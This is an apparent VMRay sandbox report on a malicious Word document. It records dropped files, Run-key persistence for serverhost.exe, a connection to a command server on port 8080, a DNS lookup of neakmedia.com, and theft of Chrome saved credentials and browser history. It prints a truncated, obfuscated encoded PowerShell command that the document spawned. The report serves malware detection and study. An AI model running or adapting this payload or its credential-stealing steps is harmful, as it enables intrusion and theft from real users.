da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\c571.tmp programdata\c571.tmp c:\ c:\programdata\c571.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\c572.tmp programdata\c572.tmp c:\ c:\programdata\c572.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe exe Mutex MA991ED3B WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER serverhost "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" REG_SZ WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER serverhost "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" REG_SZ SocketAddress 167.114.121.80 8080 NetworkConnection HTTP 167.114.121.80 8080 WinRegistryKey Software\Qualcomm\Eudora\CommandLine HKEY_CURRENT_USER WinRegistryKey Software\Classes\Software\Qualcomm\Eudora\CommandLine\current HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Thunderbird HKEY_LOCAL_MACHINE File programdata\c572.tmp programdata\c572.tmp c:\ c:\programdata\c572.tmp tmp File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Clients\Mail\Microsoft Outlook HKEY_LOCAL_MACHINE DLLPathEx MSIApplicationLCID File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat dat File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\mshist012017101220171013\index.dat users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\mshist012017101220171013\index.dat c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\mshist012017101220171013\index.dat dat File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\index.dat users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\index.dat c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\index.dat dat File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017063020170701\index.dat users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017063020170701\index.dat c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017063020170701\index.dat dat File users\bgc6u8oy yxgxkr\appdata\roaming\mozilla\firefox\profiles\zp0p8bce.default\places.sqlite users\bgc6u8oy yxgxkr\appdata\roaming\mozilla\firefox\profiles\zp0p8bce.default\places.sqlite c:\ c:\users\bgc6u8oy yxgxkr\appdata\roaming\mozilla\firefox\profiles\zp0p8bce.default\places.sqlite sqlite File users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\web data users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\web data c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\web data File users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\login data users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\login data c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\google\chrome\user data\default\login data File programdata\c571.tmp programdata\c571.tmp c:\ c:\programdata\c571.tmp tmp WinRegistryKey Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox\bin HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe HKEY_LOCAL_MACHINE File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MA991ED3B File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe exe Mutex MA991ED3B Mutex Global\I78B95E2E Mutex Global\M78B95E2E WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER serverhost "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" REG_SZ Analyzed Sample #19564 Malware Artifacts 19564 Sample-ID: #19564 Job-ID: #10995 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #19564 Submission-ID: #19715 C:\Users\BGC6u8Oy yXGxkR\Desktop\sample_file.doc doc MD5 e3f53eb751acc7eb18645753a15a1325 SHA1 b98d80994ef3f6a66ce37fabcb862752673de8d5 SHA256 455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53 Opened_By Metadata of Analysis for Job-ID #10995 Timeout False x86 32-bit PAE 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1) win7_32_sp1-mso2013 True 146.967 Windows 7 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "neakmedia.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe". Create process Anti Analysis VTI rule match with VTI rule score 4/5 vmray_detect_debugger_by_api Check via API "IsDebuggerPresent". Try to detect debugger Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "MACA73F0A". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\I78B95E2E". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\M78B95E2E". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "MA991ED3B". Create system object Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add ""C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"" to windows startup via registry. Install system startup script or application Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "MB66D4A35". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp"". Create process Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_history Read the browsing history for "Microsoft Internet Explorer". Read data related to browsing history Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Google Chrome". Read data related to saved browser credentials Information Stealing VTI rule match with VTI rule score 4/5 vmray_readout_browser_credentials Possibly trying to readout browser credentials. Read browser data